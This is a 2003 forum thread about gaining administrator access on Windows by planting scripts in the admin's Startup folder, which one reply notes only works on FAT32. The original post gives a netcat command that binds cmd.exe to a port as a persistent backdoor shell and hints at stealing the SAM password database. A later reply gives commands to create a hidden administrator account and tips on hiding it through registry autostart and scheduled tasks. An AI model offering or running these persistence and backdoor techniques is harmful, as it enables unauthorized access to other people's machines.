April 26th, 2003, 07:47 PM
start menu trick...
I was amazed to see a big security hole (\as big as pumpkin/) that could be exploited in windows!!!
ya, in windows even guest <guest access/account> has the right to peep inside the ‘ C:\Documents and Settings\administrator\Start Menu\Programs\Startup’ !!!!!
!!!After it's a administrator startup... but everyone has the freedom to copy , past almost anything to that folder!!! In windows… <Mr. Gates ... why didn't you thought about this!>
ya the admin…startup, could be followed by a script for scandisk, write reg. values, format, or upgrade the partition to NTFS after the following reboot !...or ???
<hUNT3R] wonder’s, how many of windows user's keep a constant eye on their startup files.... [/hUNT3R>
< have you been infected by a Trojan!!! ...Long ago,????
This proves ... you don’t! keep your ...eye ......... >
if there is still anyone who wonder how I got the admin. Access and enjoyed the right's,
Here is what I did!
I Created a hidden script that did this... <of-course in hidden mode!>
And executed the command by the help of batch…
c:\windows\system32\> nc.exe -L -d -e c:\windows\system32\cmd.exe -p 1773
WOW, now netcat launched itself in Trojan mode on every startup! Binding with port 1337
and giving you a cmd.exe _"shell"_ when you telnet into the pc...
So now you can get back to the network whenever you wish!!! <Is anybody thinking about backing up Sam account's...??? >
| .oÛ_Oo.h»UNTER.oO_Ûo. |
§ !¹007Õ°¿ÑïÞÎß°Õæ9*½¹! ‡
April 26th, 2003, 08:16 PM
This is inaccurate.
The Administrator's profile is, by default, only accessible to them. The ACL is set when the user's profile is created. So to get "administrator" privileges, either you have to be running on a FAT filesystem (i.e. not recommended by MS) or have administrator rights already (pointless, eh?)
This is not a real issue.
April 26th, 2003, 08:27 PM
I've done that netcat trick a few times my self, but it's probably easier, to do this in your batch file
netusers batman robin /add && netgroups administrators batman /add
robin being the pasword, of couse you can change this to what ever suites you. What I also like to do, is add that command line into the registry, so it auto starts, without lauching a batch script as the admin logs in, they tend to notice dos windows opening and closing out quickly.
You can even do a combination of the netcat and the useradd trick with your batch script, but even slicker than that, is to schedule this to run. Place your batch script in the %systemdrive%\windows\system32 or %systemdrive%\winnt\system32 folder than, use M$ "AT" command to schedule this to run, about once a month, so incase the account gets deleted, you'll have access again in the near future.
April 27th, 2003, 12:04 AM
April 27th, 2003, 12:26 AM
April 27th, 2003, 02:53 AM
yap i am talking about fat32. There are still dorzon's of admin's using fat32 for their convinence... You can't just babble around with your poor words brother because the fat32 exist in the world. Don't be specific , and think dynamic...
< It's like, i am talking about a disease that could infect you... you cry all around 'I AM VACCINATED' that's pointless...>